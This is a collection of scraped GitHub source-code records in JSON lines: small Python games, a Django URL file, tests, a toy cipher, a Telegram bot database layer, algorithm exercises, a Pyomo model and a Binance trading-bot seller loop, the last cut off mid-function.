{"seq_id":"18618453507","text":"#!/bin/python3\n\nimport turtle\nimport random\nimport math\n\nphi = 360 / 7\nr = 50\n\ndef gotoxy(x,y):\n    turtle.penup()\n    turtle.goto(x,y)\n    turtle.pendown()\n\ndef draw_circle(r,color):\n    turtle.fillcolor(color)\n    turtle.begin_fill()\n    turtle.circle(r)\n    turtle.end_fill()\n\ndef baraban(x,y):\n    gotoxy(x,y)\n    turtle.circle(80)\n    gotoxy(x, y + 160)\n    draw_circle(5, 'red')\n    for i in range(0,7):\n        phi_rad = phi * i * math.pi / 180.0\n        gotoxy(x + math.sin(phi_rad) * r, y + math.cos(phi_rad) * r + 60)\n        draw_circle(22, 'white')\n\ndef baraban_anim(x,y,start):\n    for i in range(start,random.randrange(7,34)):\n        phi_rad = phi * i * math.pi / 180.0\n        # use the y coordinate (not x) for the vertical offset, as in baraban above\n        gotoxy(x + math.sin(phi_rad) * r, y + math.cos(phi_rad) * r + 60)\n        draw_circle(22, 'brown')\n        draw_circle(22, 'white')\n    gotoxy(x + math.sin(phi_rad) * r, y + math.cos(phi_rad) * r + 60)\n    draw_circle(22, 'brown')\n    return i % 7\n    \n\n\nturtle.speed(0)\n\n\nbaraban(100,100)\n\nanswer = ''\nstart = 0\nwhile answer != 'N':\n    answer = turtle.textinput(\"Let's play?\", \"Y/N\")\n\n    if answer == 'Y':\n        start = baraban_anim(100, 100, start)\n        if start % 7 == 0:\n            gotoxy(-150, 250)\n            turtle.write(\"You lose\", font=(\"Arial\", 18, \"normal\"))\n        else:\n        
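        # Note (added): baraban_anim returns the stop index modulo 7; sector 0
        # is the losing case handled above, and any other sector simply falls
        # through to this pass so the next round can begin.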
pass","repo_name":"attonizee/python","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"14539832463","text":"import math\r\nimport pygame\r\n\r\n# initialize pygame and create a window\r\npygame.init()\r\nsize2 = 600\r\nscreen = pygame.display.set_mode((size2, size2))\r\npygame.display.set_caption(\"Tic-Tac-Pyramid - By Eliran Breitbart\")\r\n\r\n# global variables\r\nglobal size # board size\r\nglobal curr_player # current player 0 or 1\r\nglobal scores # [p0 score, p1 score]\r\nglobal gameTable # 2d array\r\nglobal rects # the rects of the circles on the board\r\nglobal lines # the lines for completed rows/diagonals\r\nglobal radius # the radius of the circles (in case it needs to be changed later)\r\n\r\n\r\n# prints the board in the terminal - for use in debugging if needed\r\ndef print_game_table():\r\n    width = len(', '.join(map(str, gameTable[size - 1])))\r\n    
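    # Note (added): `width` is the printed width of the longest (bottom) row;
    # every row is centred against it below, so the board prints as a pyramid.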
for i in range(size):\r\n print(', '.join(map(str, gameTable[i][0:i + 1])).center(width, ' '))\r\n\r\n\r\n# disable the right part of the board\r\ndef disable_blocks():\r\n for row in range(size):\r\n for col in range(row + 1, size):\r\n gameTable[row][col] = -1\r\n\r\n\r\n# initialize / reset the board\r\ndef initialize_data():\r\n global size, curr_player, scores, gameTable, rects, lines\r\n curr_player = 0\r\n scores = [0, 0]\r\n gameTable = [[0 for i in range(size)] for j in range(size)]\r\n disable_blocks()\r\n rects = []\r\n lines = []\r\n for row in range(size):\r\n curr = []\r\n for col in range(row + 1):\r\n curr.append(\"\")\r\n rects.append(curr)\r\n\r\n\r\n# check if we have completed a horizontal line, return points, add line to draw over\r\ndef completed_horizontal(row):\r\n for row_col in gameTable[row]:\r\n if row_col == 0:\r\n return 0\r\n for col in range(row + 1):\r\n gameTable[row][col] = -1\r\n lines.append([(rects[row][0].x - radius, rects[row][0].y + radius),\r\n (rects[row][row].x + 3 * radius, rects[row][row].y + radius)])\r\n return row + 1\r\n\r\n\r\n# check if we have completed a diagonal right-to-left, return points, add line to draw over\r\ndef completed_right_left(col):\r\n for row in range(size):\r\n if gameTable[row][col] == 0:\r\n return 0\r\n for row in range(size):\r\n gameTable[row][col] = -1\r\n lines.append([(rects[col][col].x + radius * (0.5 + math.sqrt(2)), rects[col][0].y + radius * (1 - math.sqrt(2))), (\r\n rects[size - 1][col].x + radius * (-1.25 + math.sqrt(2)), rects[size - 1][col].y + radius * (1 + math.sqrt(2)))])\r\n return size - col # size = length + 1\r\n\r\n\r\n# check if we have completed diagonal left-to-right, return points, add line to draw over\r\ndef completed_left_right(row, col):\r\n points = 0\r\n n_row = row - col\r\n n_col = 0\r\n for i in range(size - row + col):\r\n if gameTable[n_row][n_col] == 0:\r\n return 0\r\n n_row += 1\r\n n_col += 1\r\n n_row = row - col\r\n n_col = 0\r\n for i in range(size - row + col):\r\n gameTable[n_row][n_col] = -1\r\n n_row += 1\r\n n_col += 1\r\n points += 1\r\n lines.append(\r\n [(rects[row - col][0].x + radius * (1.5 - math.sqrt(2)), rects[row - col][0].y + radius * (1 - math.sqrt(2))), (\r\n rects[size - 1][size - row + col - 1].x + radius * (0.5 + math.sqrt(2)),\r\n rects[size - 1][size - row + col - 1].y + radius * (1 + math.sqrt(2)))])\r\n return points\r\n\r\n\r\n# returns all the points earned by filling circle (row,col)\r\ndef check_for_completed_lines(row, col):\r\n return completed_horizontal(row) + completed_right_left(col) + completed_left_right(row, col)\r\n\r\n\r\n# checks if the game has ended by calculating total points.\r\ndef check_game_ended():\r\n total_aqc_points = 3 * ((size * (size + 1)) // 2)\r\n if scores[0] + scores[1] == total_aqc_points:\r\n return True\r\n return False\r\n\r\n\r\n# updates the board when an available circle is chosen\r\ndef choose_point(row, col):\r\n global curr_player\r\n if gameTable[row][col] == 0:\r\n gameTable[row][col] = 1\r\n scores[curr_player] += check_for_completed_lines(row, col)\r\n curr_player = abs(curr_player - 1)\r\n print_game_table()\r\n else:\r\n print(\"player {}, you cannot fill this spot, try again\".format(curr_player))\r\n\r\n\r\n# draws all the lines\r\ndef draw_lines(lines):\r\n for coord in lines:\r\n pygame.draw.line(screen, (255, 255, 255), coord[0], coord[1], 3)\r\n\r\n\r\n# main game loop\r\ndef start_game():\r\n global rects\r\n global size\r\n global lines\r\n global radius\r\n clock = pygame.time.Clock()\r\n 
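    # Note (added): the Clock created above is what caps the frame rate --
    # clock.tick(30) at the bottom of the event loop holds roughly 30 FPS.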
lines = []\r\n size = 10\r\n pygame.font.init()\r\n initialize_data()\r\n font = pygame.font.SysFont(None, 30)\r\n font2 = pygame.font.SysFont(\"comicsansms\", 20)\r\n font3 = pygame.font.SysFont(\"comicsansms\", 15)\r\n text_surface = font.render(\r\n \"player1 score: {0}, player2 score: {1}, Current Player: {2}\".format(scores[0], scores[1], curr_player + 1),\r\n False, (255, 255, 255))\r\n texts = list(map(lambda x: font2.render(x, False, (255, 255, 255)),\r\n [\"r : restart\", \"- : smaller board\", \"+ : bigger board\"]))\r\n # game loop\r\n running = True\r\n radius = 25\r\n start = (size2 / 2, 50)\r\n\r\n while running:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n running = False\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_r:\r\n initialize_data()\r\n if event.key == pygame.K_PLUS or event.key == pygame.K_EQUALS:\r\n if size + 1 <= 10:\r\n size += 1\r\n initialize_data()\r\n if event.key == pygame.K_MINUS:\r\n if size - 1 >= 3:\r\n size -= 1\r\n initialize_data()\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n for row in range(len(rects)):\r\n for col in range(len(rects[row])):\r\n rect = rects[row][col]\r\n if rect.collidepoint(event.pos):\r\n choose_point(row, col)\r\n # clear the screen\r\n screen.fill((0, 0, 0))\r\n # draw the game board\r\n for row in range(size):\r\n for col in range(row + 1):\r\n rects[row][col] = pygame.draw.circle(screen,\r\n (255, 0, 0) if gameTable[row][col] != 0 else (255, 255, 255),\r\n (start[0] + col * 55 - row * 27.5, start[1] + row * 47), 25)\r\n if gameTable[row][col] == 0 and rects[row][col].collidepoint(pygame.mouse.get_pos()):\r\n rects[row][col] = pygame.draw.circle(screen, (0, 0, 255),\r\n (start[0] + col * 55 - row * 27.5, start[1] + row * 47), 25)\r\n text_surface = font.render(\r\n \"player1 score: {0}, player2 score: {1}, Current Player: {2}\".format(scores[0], scores[1], curr_player + 1),\r\n False, (255, 255, 255))\r\n screen.blit(text_surface, (size2 / 2 - font.size(\r\n \"player1 score: {0}, player2 score: {1}, Current Player: {2}\".format(scores[0], scores[1],\r\n curr_player + 1))[0] / 2,\r\n rects[size - 1][0].y + 70))\r\n draw_lines(lines)\r\n for idx, text in enumerate(texts):\r\n screen.blit(text, (10, idx * 22))\r\n if check_game_ended():\r\n text_surface = font.render(\"Game Ended, player {} wins\".format(1 if scores[0] > scores[1] else 2), False,\r\n (255, 255, 255))\r\n screen.blit(text_surface, (size2 / 2 - text_surface.get_size()[0] / 2, rects[size - 1][0].y + 100))\r\n pygame.display.update()\r\n clock.tick(30)\r\n\r\n\r\nstart_game()\r\n","repo_name":"EliranBreitbart/Pyramid_Game","sub_path":"game_ui.py","file_name":"game_ui.py","file_ext":"py","file_size_in_byte":7859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28023511089","text":"from django.contrib.auth.views import LogoutView\nfrom Django_blog_project import settings\nfrom django.urls import path, include\nfrom blog.views import *\n\nurlpatterns = [\n path('', MainView.as_view(), name='main'),\n path('blog/', PostsView.as_view(), name='posts'),\n path('blog//', PostDetailView.as_view(), name='post_detail'),\n path('signup/', SignUpView.as_view(), name='signup'),\n path('signin/', SignInView.as_view(), name='signin'),\n path('signout/', LogoutView.as_view(), {'next_page': settings.LOGOUT_REDIRECT_URL}, name='signout'),\n path('contact/', FeedBackView.as_view(), name='contact'),\n path('success/', AboutUSView.as_view(), name='about_us'),\n 
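    # Note (added): route order matters in this list -- the '<str:name>/'
    # author_page entry below acts as a single-segment catch-all, so literal
    # single-segment routes such as 'search/' must stay above it.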
path('search/', SearchResultsView.as_view(), name='search_results'),\n path('tag//', TagView.as_view(), name=\"tag\"),\n path('category//', CategoryView.as_view(), name=\"category\"),\n path('privacy-policy/', PrivacyPolicy.as_view(), name='privacy_policy'),\n path('', AuthorPage.as_view(), name='author_page'),\n path('blog//comments/create/', CommentCreateView.as_view(), name='comment_create_view'),\n path('user/edit/', ProfileUpdateView.as_view(), name='profile_edit'),\n path('user//', ProfileDetailView.as_view(), name='profile_detail'),\n path('post/create/', PostCreateView.as_view(), name='post_create'),\n path('post//update/', PostUpdateView.as_view(), name='post_update'),\n path('post//delete/', PostDeleteView.as_view(), name='post_delete'),\n]\n","repo_name":"melxiory/Django_blog_project","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73554240693","text":"from tkinter import Tk\r\nfrom tkinter import Button\r\nfrom project import reset_quiz\r\nfrom project import get_words\r\nimport project\r\nimport csv\r\nimport pandas as pd\r\nfrom project import delete_row \r\n\r\ndef test_get_words():\r\n # Create a temporary CSV file with known data\r\n word = \"cat\"\r\n meaning = \"animal\"\r\n \r\n with open(\"dictionary.csv\", \"w\", newline=\"\") as file:\r\n writer = csv.DictWriter(file, fieldnames=[\"word\", \"meaning\"])\r\n writer.writerow({\"word\": word, \"meaning\": meaning})\r\n\r\n # Call the get_words function and get the results\r\n meaning_list, word_list, dictionary = project.get_words() # Replace 'your_module' with the actual module name\r\n\r\n # Define the expected results\r\n expected_meaning_list = [\"animal\"]\r\n expected_word_list = [\"cat\"]\r\n expected_dict = [{\"meaning\": \"animal\",\"word\": \"cat\"}]\r\n\r\n # Check if the results match the expected values using pytest assertions\r\n assert meaning_list == expected_meaning_list\r\n assert word_list == expected_word_list\r\n assert dictionary == expected_dict\r\n\r\n# Test for reset_quiz\r\ndef test_reset_quiz():\r\n root = Tk()\r\n button = Button(root, text=\"Start Quiz\")\r\n button.pack()\r\n \r\n reset_quiz()\r\n \r\n assert len(root.winfo_children()) == 1\r\n\r\ndef test_delete_row():\r\n # Create a sample CSV file with data for testing\r\n data = {'word': ['apple', 'banana', 'cherry'], 'meaning': ['fruit', 'fruit', 'fruit']}\r\n df = pd.DataFrame(data)\r\n df.to_csv('sample_dictionary.csv', index=False)\r\n\r\n # Initially, the sample CSV should have 3 rows\r\n initial_data = pd.read_csv('sample_dictionary.csv')\r\n assert len(initial_data) == 3\r\n\r\n k = (1, \"sample_dictionary.csv\")\r\n # Delete the second row (index 1)\r\n delete_row(k)\r\n\r\n # Reload the data after deletion\r\n updated_data = pd.read_csv('sample_dictionary.csv')\r\n\r\n # Check if the row was removed\r\n assert len(updated_data) == 2\r\n assert updated_data.iloc[0]['word'] == 'apple'\r\n assert updated_data.iloc[1]['word'] == 'cherry'\r\n\r\n # Teardown: Remove the sample CSV file\r\n import os\r\n os.remove('sample_dictionary.csv')","repo_name":"mea1234/dictionary-app-with-python","sub_path":"test_project.py","file_name":"test_project.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28448880791","text":"from random import choice\n\ndef decode_Ggg(keys, text):\n keys_words = 
dict(zip(keys.split()[1::2], keys.split()[0::2]))\n text_decrypt = \"\"\n s = \"\"\n for c in text:\n if c == \"g\" or c == \"G\":\n s += c\n else:\n text_decrypt += c\n \n if s in keys_words.keys():\n text_decrypt += keys_words[s]\n s = \"\"\n return text_decrypt\n\n\ndef encode_Ggg(text):\n keys = list()\n keys_words = dict()\n text_encrypt = \"\"\n aKey = \"\"\n i = 0\n words = set([c for c in text if c.isalpha()])\n \n while i < len(words):\n akey = \"\".join(choice(\"Gg\") for _ in range(3))\n \n if akey not in keys:\n keys.insert(i, akey)\n i+=1\n \n keys_words = dict(zip(words, keys))\n \n for c in text:\n if c.isalpha():\n text_encrypt += keys_words[c]\n else:\n text_encrypt += c\n keys = ' '.join('{}{}'.format(key+\" \", val) for key, val in keys_words.items())\n \n return keys, text_encrypt\n\nprint(decode_Ggg(\"H GgG d gGg e ggG l GGg o gGG r Ggg w ggg\",\n \"GgGggGGGgGGggGG, ggggGGGggGGggGg!\"))\nprint(encode_Ggg(\"Hello, World!\"))\n\n \n\n\n","repo_name":"freddiev4/dailyprogrammerchallenges","sub_path":"Intermediate Challenges/Challenge 0245 Intermediate - Ggggggg gggg Ggggg-ggggg!/solutions/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":313,"dataset":"github-code","pt":"21"} +{"seq_id":"28428154515","text":"import logging\nimport os\nimport traceback\nfrom codecs import decode, encode\nfrom functools import lru_cache\nfrom typing import Any, Dict, List, Optional, Union\n\nfrom motor.core import AgnosticCollection\nfrom motor.motor_asyncio import (\n AsyncIOMotorClient,\n AsyncIOMotorCollection,\n AsyncIOMotorDatabase,\n)\nfrom pymongo.errors import OperationFailure\nfrom yaml import full_load\n\nfrom .base import Base # pylint: disable=R0401\nfrom .errors import BackupError\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass DataBase(Base):\n \"\"\"Client Database on MongoDB\"\"\"\n\n __client__: AsyncIOMotorClient\n __db__: AsyncIOMotorDatabase\n __lang__: AsyncIOMotorCollection\n __language__: List[str]\n __list_collection__: List[str]\n __strings__: Dict[str, str]\n __chat_lang__: Dict[int, str]\n\n def __init__(self):\n self.__language__ = sorted(\n [os.path.splitext(filename)[0] for filename in os.listdir(\"./language\")]\n )\n self.__strings__ = {}\n self.__chat_lang__ = {}\n\n super().__init__()\n\n @property\n def language(self) -> list:\n \"\"\"Return list of bot suported languages\"\"\"\n return self.__language__\n\n @property\n def lang_col(self) -> AgnosticCollection:\n \"\"\"Return client language collection\"\"\"\n return self.__lang__\n\n def _load_language(self):\n \"\"\"Load bot language.\"\"\"\n LOGGER.info(\"Loading language...\")\n for i in self.__language__:\n LOGGER.debug(f\"Loading language: {i}\")\n with open(f\"./language/{i}.yml\", \"r\") as text:\n self.__strings__[i] = full_load(text)\n LOGGER.debug(f\"Language {self.__language__} loaded\")\n\n async def connect_db(self, db_name: str) -> None:\n \"\"\"Connect to MongoDB client\n\n Parameters:\n db_name (`str`): Database name to log in. Will create new Database if not found.\n \"\"\"\n LOGGER.info(\"Connecting to MongoDB...\")\n try:\n self.__client__ = AsyncIOMotorClient(self.get_config.db_uri, connect=False)\n if db_name in await self.__client__.list_database_names():\n LOGGER.debug(\"Database found, Logged in to Database...\")\n else:\n LOGGER.debug(\"Database not found! 
Creating New Database...\")\n except OperationFailure as err:\n traceback.print_exc()\n LOGGER.critical(f\"DATABASE AUTHENTICATION FAILED\\n{err}\")\n await self.loop.stop()\n\n self.__db__ = self.__client__[db_name]\n self.__list_collection__ = await self.__db__.list_collection_names()\n LOGGER.info(\"Database connected\")\n self.__lang__ = self.get_collection(\"LANGUAGE\")\n async for i in self.__lang__.find():\n self.__chat_lang__[i[\"chat_id\"]] = i[\"language\"]\n\n async def disconnect_db(self) -> None:\n \"\"\"Disconnect database client\"\"\"\n self.__client__.close()\n LOGGER.info(\"Disconnected from database\")\n\n def get_collection(self, name: str) -> AgnosticCollection:\n \"\"\"Get collection from database.\n\n Parameters:\n name (`str`): Collection name to fetch\n \"\"\"\n if name in self.__list_collection__:\n LOGGER.debug(f\"Collection {name} Found, fetching...\")\n else:\n LOGGER.debug(f\"Collection {name} Not Found, Creating New Collection...\")\n return self.__db__[name]\n\n @lru_cache(maxsize=100)\n def get_lang(self, chat_id) -> str:\n \"\"\"Get user language setting.\"\"\"\n return self.__chat_lang__.get(chat_id, \"en\")\n\n async def switch_lang(self, chat_id: Union[str, int], language: str) -> None:\n \"\"\"Change chat language setting.\"\"\"\n await self.__lang__.update_one(\n {\"chat_id\": int(chat_id)},\n {\"$set\": {\"language\": language}},\n upsert=True,\n )\n self.__chat_lang__[int(chat_id)] = language\n self.get_lang.cache_clear()\n\n async def migrate_chat(self, old_chat: int, new_chat: int):\n \"\"\"Run all migrate handler on every migrateable plugin\"\"\"\n LOGGER.debug(f\"Migrating chat from {old_chat} to {new_chat}\")\n for plugin in list(self.plugins.values()):\n if hasattr(plugin, \"__migrate__\"):\n await plugin.__migrate__(old_chat, new_chat)\n\n async def text(\n self,\n chat_id: int,\n name: str,\n *args: Optional[Any],\n **kwargs: Optional[Any],\n ) -> str:\n \"\"\"Parse the string with user language setting.\n\n Parameters:\n chat_id (`int`):\n Id of the sender(PM's) or chat_id to fetch the user language setting.\n\n name (`str`):\n String name to parse. 
The string is parsed from YAML documents.\n\n *args (`any`, *Optional*):\n One or more values that should be formatted and inserted in the string.\n The value should be in order based on the language string placeholder.\n\n **kwargs (`any`, *Optional*):\n One or more keyword values that should be formatted and inserted in the string.\n based on the keyword on the language strings.\n\n special parameters:\n noformat (`bool`, *Optional*):\n If it exists and is True, the text returned will not be formatted.\n Default to False.\n\n \"\"\"\n lang = self.get_lang(chat_id)\n noformat = bool(kwargs.get(\"noformat\", False))\n\n if lang in self.__language__ and name in self.__strings__[lang]:\n text = decode(\n encode(\n self.__strings__[lang][name],\n \"latin-1\",\n \"backslashreplace\",\n ),\n \"unicode-escape\",\n )\n return text if noformat else text.format(*args, **kwargs)\n err = \"NO LANGUAGE STRING FOR {} in {}\".format(name, lang)\n LOGGER.warning(err)\n # try to send the english string first if not found\n try:\n text = decode(\n encode(\n self.__strings__[\"en\"][name],\n \"latin-1\",\n \"backslashreplace\",\n ),\n \"unicode-escape\",\n )\n return text if noformat else text.format(*args, **kwargs)\n except KeyError:\n return err + \"\\nPlease forward this to @ProtectorChats\"\n\n async def backup_plugin_data(\n self, chat_id: int, data: Optional[Dict] = None\n ) -> Union[Dict, None]:\n \"\"\"Backup chat data\n\n Parameters:\n chat_id (`int`):\n Id of the sender(PM's) or chat_id to fetch the user language setting.\n data (`dict`, *Optional*):\n Data to restore. Only pass this if you want to restore.\n\n Returns:\n dict of backup if no data passed, otherwise None.\n \"\"\"\n if not isinstance(data, (type(None), dict)):\n raise BackupError(f\"Data must be a dict or Nonetype not {data.__class__.__name__}\")\n\n LOGGER.debug(\"{} chat data from {}\".format(\"Importing\" if data else \"Exporting\", chat_id))\n result = {\"chat_id\": chat_id}\n for plugin in list(self.plugins.values()):\n if hasattr(plugin, \"__backup__\"):\n if not data:\n LOGGER.debug(f\"Backing up {plugin.name} data\")\n plugin_data = await plugin.__backup__(chat_id)\n if not isinstance(plugin_data, (type(None), dict)):\n raise BackupError(\n f\"Unexpected return value type from `{plugin.name}` plugin: \"\n \"expecting a dict or NoneType, \"\n f\"got {plugin_data.__class__.__name__}\"\n )\n if not plugin_data: # skip plugin if no data\n continue\n result.update({plugin.name: plugin_data})\n else:\n LOGGER.debug(f\"restoring {plugin.name} data\")\n await plugin.__backup__(chat_id, data)\n return result if not data else None\n","repo_name":"iamarch/Protector","sub_path":"Protector/core/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":8160,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
{"seq_id":"22328108766","text":"\n#https://www.spoj.com/problems/MST/\nimport sys\nfrom collections import defaultdict\ntry: \n\tsys.stdin = open('input.txt', 'r') \n\tsys.stdout = open('output.txt', 'w')\n\nexcept: \n\tpass\n\n\n\nclass DisjointSet():\n def __init__(self,n):\n self.parent=[]\n self.rank=[]\n for i in range(n+1):\n self.parent.append(i)\n self.rank.append(0) #default rank\n\n def find(self,node):\n if(node==self.parent[node]):\n return node\n self.parent[node]=self.find(self.parent[node]) #path compression\n return self.parent[node]\n\n def union(self,u,v):\n leader_u=self.find(u)\n leader_v=self.find(v)\n if(self.rank[leader_u]>self.rank[leader_v]):\n u,v=v,u\n 
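# swap the leaders too, so leader_u is always the lower-rank root and gets attached under leader_v\n 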
leader_u,leader_v=leader_v,leader_u\n if(leader_u!=leader_v):\n self.parent[leader_u]=leader_v #update pointer\n self.rank[leader_v]+=1 #update rank\n \ndef hasSingleCycle(array):\n # Write your code here.\n \n n=len(array)\n ds=DisjointSet(n)\n for i,jumps in enumerate(array):\n u=i\n v=(i+jumps)%n\n if(ds.find(u)==ds.find(v)):\n return True\n ds.union(u,v)\n \n \n \n return False\n \n \n \n \nprint(hasSingleCycle([2,3,1,-4,-4,2]))\n\n\n\n\n\n\n\t\t\n\n\t\t\n\t\t\t\t\n\n\n\n\n\t\t\n\n","repo_name":"thecodearrow/Algorithms","sub_path":"Data Stuctures/Disjoint Sets/MST.py","file_name":"MST.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
{"seq_id":"22141320454","text":"import sys\n\ndef quicksort(arr):\n\tarr = helpersort(arr, 0, len(arr) - 1)\n\treturn arr\n\ndef helpersort(arr, low, pivote):\n\tif pivote <= low:\n\t\treturn arr\n\n\tcount = low\n\tfor i in range(low,pivote):\n\t\tif arr[i] < arr[pivote]:\n\t\t\tarr[i], arr[count] = arr[count], arr[i]\n\t\t\tcount += 1\n\n\tarr[pivote], arr[count] = arr[count], arr[pivote]\n\t\n\tarr = helpersort(arr, low, count - 1)\n\tarr = helpersort(arr, count + 1, pivote)\n\n\treturn arr\n\ndef replaces(arr, i, j):\n\tarr[i] = arr[i].replace('[', '')\n\tarr[j] = arr[j].replace(']', '')\n\treturn arr\n\nif len(sys.argv) > 1:\n\tarr = sys.argv[1:]\n\n\tif len(arr) == 1:\n\t\tarr = replaces(arr, 0, 0)\n\t\tarr = arr[0].split(',')\n\n\tn = len(arr)\n\tarr = replaces(arr, 0, n-1)\n\t\n\tarr1 = []\n\tfor i in range(0, n):\n\t\tif arr[i] != '':\n\t\t\tarr[i] = arr[i].replace(',', '')\n\t\t\tarr1.append(int(arr[i]))\n\n\tprint(quicksort(arr1))\nelse:\n\tprint([])\n","repo_name":"TamerB/practicing_algorithms","sub_path":"devide_and_conquer/quicksort/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"19642141075","text":"from util.math.vector3 import Vector3\n\nTest_Verts = [\n Vector3([0, 0, 0], data_type=float),\n Vector3([0, 1, 0], data_type=float),\n Vector3([0, 1, 1], data_type=float),\n Vector3([0, 0, 1], data_type=float),\n ]\n\nTest_Tris_Index = [\n Vector3([0, 1, 2]),\n Vector3([1, 2, 3])\n]\n\nif __name__ == '__main__':\n from solo_mesh import SoloMesh\n from recast.geom import Geom\n from recast.build_config import BuildConfig\n from recast.context import Context\n context = Context()\n config = BuildConfig()\n geom = Geom(verts=Test_Verts, tris_index=Test_Tris_Index)\n soleMesh = SoloMesh(context, config, geom)\n","repo_name":"ZhengYunH/PyRecastDetour","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"2996068681","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 13 20:44:26 2020\n\n@author: sergi\n\"\"\"\n\nfrom __future__ import division\nfrom pyomo.environ import *\nfrom pyomo.opt import SolverFactory\n\n\n\n# M = model\nM = ConcreteModel()\n\n# Sets and Parameters\n\n#M.valor=[2, 5, 4, 2, 6, 3, 1, 4]\n\nnumProyectos=8\n\nM.p=RangeSet(1, numProyectos)\n\nM.valor=Param(M.p, mutable=True)\n\nfor i in M.p:\n M.valor[i]=2 \n\nM.valor[1]=2\nM.valor[2]=5\nM.valor[3]=4\nM.valor[4]=2\nM.valor[5]=6\nM.valor[6]=3\nM.valor[7]=1\nM.valor[8]=4\n\n#a=M.valor.__dict__\n#b=dir(M.valor._data[1])\n#c=M.valor._data[1].value\n \n#for i in M.p:\n# 
print(M.valor._data[i].value)\n \n\n# Variables\nM.x = Var(M.p, domain=Binary)\n\n# Objective Function\nM.obj = Objective(expr = sum(M.x[i]*M.valor[i] for i in M.p), sense=maximize)\n\n# Constraints\n#def res1(M):\n# return \nM.res1 = Constraint(expr = sum(M.x[i] for i in M.p) == 2)\n\n# Applying the solver\nSolverFactory('glpk').solve(M)\n\nM.display()\n","repo_name":"sergiocanalesm1/Optimization_python","sub_path":"venv/ejemplos/proyectos.py","file_name":"proyectos.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"72260051252","text":"from binance.exceptions import BinanceAPIException\nimport Database\nfrom binance.client import Client\nimport config\nimport time\nfrom indicator import MACDEMA\nimport setup\nimport requests\n\nintervals = (\n ('weeks', 604800), # 60 * 60 * 24 * 7\n ('days', 86400), # 60 * 60 * 24\n ('hours', 3600), # 60 * 60\n ('minutes', 60),\n )\n\ndef display_time(seconds, granularity=3):\n result = []\n\n for name, count in intervals:\n value = seconds // count\n if value:\n seconds -= value * count\n if value == 1:\n name = name.rstrip('s')\n result.append(\"{} {}\".format(value, name))\n return ', '.join(result[:granularity])\n\n\nconnection = Database.create_connection(\"test.db\")\n\nTIME = \"3 week ago UTC+3\"\n\ndef seller():\n print(\"Seller is working...\")\n client2 = Client(config.api_key2, config.api_secret2)\n while True:\n if Database.count_open_orders(connection) > 0:\n SYMBOLS = Database.getOpenOrder(connection)\n for x in SYMBOLS:\n try:\n time.sleep(0.3)\n klines = client2.get_historical_klines(x[1], Client.KLINE_INTERVAL_4HOUR, TIME)\n if len(klines) > 26:\n close=[]\n for entry in klines:\n close.append(float(entry[4]))\n macdBuy, macdSell, macd, signal = MACDEMA(close)\n #cciBuy, cciSell,invcci = cci(close)\n stop = close[-1] < x[2]\n sell = close[-1] >= x[3]\n \n if macdSell:\n order = (klines[-1][4],klines[-1][0],x[0])\n Database.sellOrder(connection,order)\n timeClose = display_time(int(time.time()-x[4]))\n msg = x[1] + \"\\U0001F4B0 Sale: \" + str(round(float(klines[-1][4]),8)).replace(\".\", \"\\\\.\") + Database.profitCalc(connection,x[0]) + \"\\n\" + timeClose\n setup.bot.send_message(-1001408874432, msg)\n continue\n if stop:\n order = (klines[-1][4],klines[-1][0],x[0])\n Database.sellOrder(connection,order)\n timeClose = display_time(int(time.time()-x[4]))\n msg = x[1]+ \"\\U0001F534 Stop: \" + str(round(float(klines[-1][4]),8)).replace(\".\", \"\\\\.\") + Database.profitCalc(connection,x[0]) + \"\\n\" + timeClose\n setup.bot.send_message(-1001408874432, msg)\n continue\n if sell:\n order = (klines[-1][4],klines[-1][0],x[0])\n Database.sellOrder(connection,order)\n timeClose = display_time(int(time.time()-x[4]))\n msg = x[1]+ \"\\U0001F4B8 Sale: \" + str(round(float(klines[-1][4]),8)).replace(\".\", \"\\\\.\") + Database.profitCalc(connection,x[0]) + \"\\n\" + timeClose\n setup.bot.send_message(-1001408874432, msg)\n continue\n\n except BinanceAPIException as e:\n print('Something went wrong in seller')\n time.sleep(60)\n client2 = Client(config.api_key2, config.api_secret2)\n continue\n except:\n setup.bot.send_message(923698949, 'Seller error')\n print(\"unexpected error in seller\")\n time.sleep(60)\n client2 = Client(config.api_key2, config.api_secret2)\n continue\n else:\n 
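# no open orders to track right now, so pause briefly before polling the database again\n 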
